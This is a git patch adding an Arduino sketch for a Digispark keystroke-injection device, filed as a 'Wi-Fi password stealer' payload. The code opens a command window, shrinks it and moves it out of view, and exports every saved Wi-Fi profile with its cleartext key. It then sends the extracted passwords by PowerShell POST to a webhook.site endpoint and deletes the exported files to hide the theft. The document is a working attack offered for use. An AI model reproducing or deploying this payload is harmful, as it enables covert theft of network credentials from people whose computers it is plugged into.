From 4e905d1fcc6026cebbe973bb6d25204d0c6184eb Mon Sep 17 00:00:00 2001 From: Muhammad Talha Khan Date: Thu, 27 Dec 2018 22:59:38 +0500 Subject: [PATCH] Add files via upload --- .../WifiKey-Grab_Minimize-of-Shame.ino | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino diff --git a/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino b/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino new file mode 100644 index 0000000..d8531a8 --- /dev/null +++ b/payloads/Wi-Fi password stealer/WifiKey-Grab_Minimize-of-Shame.ino @@ -0,0 +1,52 @@ +/* + Following payload will grab saved Wifi password and will send them to your hosted webhook and hide the cmd windows by using technique mentioned in hak5darren + rubberducky wiki -- Payload hide cmd window [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window] +*/ + + +#include "DigiKeyboard.h" +#define KEY_DOWN 0x51 // Keyboard Down Arrow +#define KEY_ENTER 0x28 //Return/Enter Key + +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} + +void loop() { + + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run + DigiKeyboard.delay(100); + DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible + DigiKeyboard.delay(500); + DigiKeyboard.delay(500); + DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu + DigiKeyboard.sendKeyStroke(KEY_M); //goto Move + for(int i =0; i < 100; i++) + { + DigiKeyboard.sendKeyStroke(KEY_DOWN); + } + DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling + DigiKeyboard.delay(100); + DigiKeyboard.println("cd %temp%"); //going to temporary dir + DigiKeyboard.delay(500); + DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir + DigiKeyboard.delay(500); + DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir + DigiKeyboard.delay(500); + DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook + DigiKeyboard.delay(1000); + DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess + DigiKeyboard.delay(100); + DigiKeyboard.println("exit"); + DigiKeyboard.delay(100); + + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); + +}